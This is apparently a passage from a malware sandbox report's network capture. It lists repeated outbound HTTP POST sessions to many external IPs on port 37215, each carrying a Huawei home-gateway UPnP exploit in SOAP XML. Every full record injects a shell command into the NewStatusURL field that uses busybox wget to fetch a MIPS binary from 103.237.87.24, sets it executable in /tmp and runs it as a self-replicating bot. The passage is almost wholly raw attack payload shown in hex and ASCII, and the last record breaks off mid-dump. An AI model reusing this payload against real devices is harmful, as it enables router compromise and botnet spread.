                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  198192.168.2.135378241.34.102.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.071542025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  199192.168.2.1348038197.130.72.7837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.071546078 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  200192.168.2.136045874.34.228.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.075426102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  201192.168.2.1336676157.225.11.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.075428009 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  202192.168.2.134930841.239.95.137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.075428009 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  203192.168.2.1345388197.239.161.2737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.075428009 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  204192.168.2.1360552197.196.83.2637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.075428009 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  205192.168.2.134361841.198.15.7937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.075434923 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  206192.168.2.134707641.197.68.9737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.075474024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  207192.168.2.135999041.1.71.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.075481892 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 